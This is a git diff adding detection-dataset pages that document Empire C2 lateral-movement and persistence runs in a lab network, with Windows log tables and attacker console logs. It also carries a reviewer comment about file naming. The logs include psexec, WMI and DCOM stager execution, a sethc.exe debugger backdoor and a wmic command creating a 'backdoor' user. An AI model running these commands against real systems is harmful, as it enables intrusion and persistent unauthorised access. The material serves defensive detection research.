[y/N] y +[*] Tasked V6W3TH8Y to run TASK_CMD_JOB +[*] Agent V6W3TH8Y tasked with task ID 2 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_psexec +(Empire: powershell/lateral_movement/invoke_psexec) > Job started: 9GY4PC +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent EXBNZYTS checked in +[+] Initial agent EXBNZYTS from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to EXBNZYTS at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_psexec) > +(Empire: powershell/lateral_movement/invoke_psexec) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:07:43 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:07:42 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:07:44 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:07:42 https + XSZ91N7T ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 4172 5/0.0 2019-05-18 21:07:43 https + EXBNZYTS ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 6728 5/0.0 2019-05-18 21:07:42 https + + +(Empire: agents) > +``` \ No newline at end of file diff --git a/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.tar.gz b/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.tar.gz new file mode 100644 index 00000000..0b9a3cf2 Binary files /dev/null and b/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.tar.gz differ diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/README.md b/small_datasets/windows/execution/windows_management_instrumentation_T1047/README.md new file mode 100644 index 00000000..f6bc2a81 
--- /dev/null +++ b/small_datasets/windows/execution/windows_management_instrumentation_T1047/README.md @@ -0,0 +1,11 @@ +# Windows Management Instrumentation (WMI) + +Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_wmi](./empire_invoke_wmi.md) | 2019-05-18214442 | +| shire | [empire_invoke_wmi_debugger](./empire_invoke_wmi_debugger.md) | 2019-05-18215622 | +| shire | [empire_wmic_add_user_backdoor](./empire_wmic_add_user_backdoor.md) | 2019-05-18231333 | \ No newline at end of file diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.md b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.md new file mode 100644 index 00000000..933d4a7b --- /dev/null +++ b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.md 
@@ -0,0 +1,143 @@ +# Empire Invoke WMI + +An adversary can use powershell to execute a stager via WMI + +## Technique(s) ID + +T1047 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_wmi.tar.gz](./empire_invoke_wmi.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18214442 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 834 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Microsoft-Windows-GroupPolicy | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 240 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 105 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 48 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 30 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 16 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 15 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 14 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 13 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 13 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 9 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| 
Security | Microsoft-Windows-Security-Auditing | Other Logon/Logoff Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1276 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 793 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 709 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 223 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 80 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 29 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 21 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 18 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 16 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 706 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker 
Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_wmi +(Empire: powershell/lateral_movement/invoke_wmi) > info + + Name: Invoke-WMI + Module: powershell/lateral_movement/invoke_wmi + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Executes a stager on remote hosts using WMI. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Proxy False default Proxy to use for request (default, none, + or other). + UserName False [domain\]username to use to execute + command. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Password False Password to use to execute command. + Agent True V6W3TH8Y Agent to run module on. 
+ +(Empire: powershell/lateral_movement/invoke_wmi) > set Listener https +(Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_wmi) > execute +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 6 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_wmi +(Empire: powershell/lateral_movement/invoke_wmi) > Invoke-Wmi executed on "IT001.shire.com" +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent ZLPB8CV3 checked in +[+] Initial agent ZLPB8CV3 from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to ZLPB8CV3 at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_wmi) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:45:47 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:45:44 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:45:43 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:45:43 https + 38APWSR1 ps 172.18.39.105 IT001 *SHIRE\pgustavo MSBuild 5656 5/0.0 2019-05-18 21:45:46 https + ZLPB8CV3 ps 172.18.39.105 IT001 *SHIRE\pgustavo powershell 5804 5/0.0 2019-05-18 21:45:44 https + + +(Empire: agents) > interact ZLPB8CV3 +(Empire: ZLPB8CV3) > shell whoami +[*] Tasked ZLPB8CV3 to run TASK_SHELL +[*] Agent ZLPB8CV3 tasked with task ID 1 +(Empire: ZLPB8CV3) > shire\pgustavo +..Command execution completed. + +(Empire: ZLPB8CV3) > +``` \ No newline at end of file 
diff --git a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.tar.gz b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.tar.gz similarity index 100% rename from small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.tar.gz rename to small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.tar.gz diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.md b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.md new file mode 100644 index 00000000..f469facc --- /dev/null +++ b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.md 
@@ -0,0 +1,157 @@ +# Empire Invoke WMI Debugger + +Uses WMI to set the debugger for a target binary on a remote machine to be cmd.exe or a stager. + +## Technique(s) ID + +T1047 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_wmi_debugger.tar.gz](./empire_invoke_wmi_debugger.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18215622 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 539 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 172 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 131 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 40 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 11 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 9 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 8 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 7 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1920 | +| 
Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 325 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 312 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 156 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 23 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 19 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 449 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 3 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Stopping Command | 3 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_wmi_debugger +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > info + + Name: Invoke-WMIDebugger + Module: powershell/lateral_movement/invoke_wmi_debugger + NeedsAdmin: False + OpsecSafe: False + Language: powershell 
+MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Uses WMI to set the debugger for a target binary on a remote + machine to be cmd.exe or a stager. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener False Listener to use. + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Cleanup False Switch. Disable the debugger for the + specified TargetBinary. + TargetBinary True sethc.exe Target binary to set the debugger for + (sethc.exe, Utilman.exe, osk.exe, + Narrator.exe, or Magnify.exe) + UserName False [domain\]username to use to execute + command. + Binary False C:\Windows\System32\cmd. Binary to set for the debugger. + exe + RegPath False HKLM:Software\Microsoft\ Registry location to store the script + Network\debug code. Last element is the key name. + Password False Password to use to execute command. + Agent True V6W3TH8Y Agent to run module on. + +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set Listener https +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set Listener '' +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > info + + Name: Invoke-WMIDebugger + Module: powershell/lateral_movement/invoke_wmi_debugger + NeedsAdmin: False + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Uses WMI to set the debugger for a target binary on a remote + machine to be cmd.exe or a stager. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener False Listener to use. + CredID False CredID from the store to use. + ComputerName True IT001.shire.com Host[s] to execute the stager on, comma + separated. + Cleanup False Switch. 
Disable the debugger for the + specified TargetBinary. + TargetBinary True sethc.exe Target binary to set the debugger for + (sethc.exe, Utilman.exe, osk.exe, + Narrator.exe, or Magnify.exe) + UserName False [domain\]username to use to execute + command. + Binary False C:\Windows\System32\cmd. Binary to set for the debugger. + exe + RegPath False HKLM:Software\Microsoft\ Registry location to store the script + Network\debug code. Last element is the key name. + Password False Password to use to execute command. + Agent True V6W3TH8Y Agent to run module on. + +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 7 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_wmi_debugger +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > Invoke-Wmi executed on "IT001.shire.com" to set the debugger for sethc.exe to be C:\Windows\System32\cmd.exe. + +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > +``` \ No newline at end of file diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.tar.gz b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.tar.gz new file mode 100644 index 00000000..311f678c Binary files /dev/null and b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.tar.gz differ diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user.tar.gz b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user.tar.gz new file mode 100644 index 00000000..f268e895 Binary files /dev/null and b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user.tar.gz differ 
diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user_backoor.md b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user_backoor.md new file mode 100644 index 00000000..c966064e --- /dev/null +++ b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user_backoor.md 
@@ -0,0 +1,83 @@ +# Empire WMIC Add User Backdoor + +Adversaries can use wmic to remotely execute code and add a backdoor user for persistence. + +## Technique(s) ID + +T1047 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_wmic_add_user.tar.gz](./empire_wmic_add_user.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18231333 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 578 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 193 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 129 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 32 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 26 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 25 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 24 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 22 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 12 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 8 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 3 | +| Security | Microsoft-Windows-Security-Auditing | User Account Management | 3 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 2 | +| Security | 
Microsoft-Windows-Security-Auditing | Security Group Management | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Authentication Service | 1 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 289 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 212 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 178 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 138 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 30 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 18 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 481 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > shell wmic /node:IT001 process call create "net user /add backdoor pa$$w0rd1" +[*] Tasked V6W3TH8Y to run TASK_SHELL +[*] Agent V6W3TH8Y tasked with task ID 12 +(Empire: V6W3TH8Y) > Executing (Win32_Process)->Create() + +Method execution successful. 
+ +Out Parameters: +instance of __PARAMETERS +{ + ProcessId = 6580; + ReturnValue = 0; +}; + +..Command execution completed. + +(Empire: V6W3TH8Y) > +``` \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/README.md b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/README.md new file mode 100644 index 00000000..f705389f --- /dev/null +++ b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/README.md @@ -0,0 +1,11 @@ +# Distributed Component Object Model + +Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM) beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). + +Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. By default, only Administrators may remotely activate and launch COM objects through DCOM. Adversaries may use DCOM for lateral movement. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_dcom](./empire_invoke_dcom.md) | 2019-05-18211052 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.md b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.md new file mode 100644 index 00000000..ec91c888 --- /dev/null +++ b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.md 
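Review bot: the new file is named `empire_wmic_add_user_backoor.md` while the archive it links is `empire_wmic_add_user.tar.gz` and the lateral-movement WMI README in this same patch links to `empire_wmic_add_user_backdoor.md`; rename the markdown file to `empire_wmic_add_user_backdoor.md` (and ideally the tarball to match) so the README link resolves. Since the description says the command adds a backdoor user for persistence, T1136 (Create Account) should be listed under Technique(s) ID next to T1047; the `User Account Management` (3) and `SAM` (1) rows in the log table are the account-creation artifacts a reader will want to be pointed at.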
@@ -0,0 +1,138 @@ +# Empire Ivoke DCOM + +Invoke commands on remote hosts via MMC20.Application COM object over DCOM. + +## Technique(s) ID + +T1175 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_dcom.tar.gz](./empire_invoke_dcom.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18211052 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1042 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 302 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 127 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 35 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 11 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 8 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 7 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 7 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 7 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 6 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | 
Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1120 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 518 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 414 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 286 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 31 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 8 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File creation time changed (rule: FileCreateTime) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 880 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | 
Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Empire Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_dcom +(Empire: powershell/lateral_movement/invoke_dcom) > info + + Name: Invoke-DCOM + Module: powershell/lateral_movement/invoke_dcom + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @rvrsh3ll + +Description: + Invoke commands on remote hosts via MMC20.Application COM object over DCOM. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Proxy False default Proxy to use for request (default, none, + or other). + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Method True ShellWindows COM method to use. MMC20.Application,She + llWindows,ShellBrowserWindow,ExcelDDE + Agent True V6W3TH8Y Agent to run module on. 
+ +(Empire: powershell/lateral_movement/invoke_dcom) > set Listener https +(Empire: powershell/lateral_movement/invoke_dcom) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_dcom) > execute +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 3 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_dcom +(Empire: powershell/lateral_movement/invoke_dcom) > Completed + + +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent YR1FKZ6A checked in +[+] Initial agent YR1FKZ6A from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to YR1FKZ6A at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_dcom) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:11:59 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:11:59 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:11:58 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:11:58 https + XSZ91N7T ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 4172 5/0.0 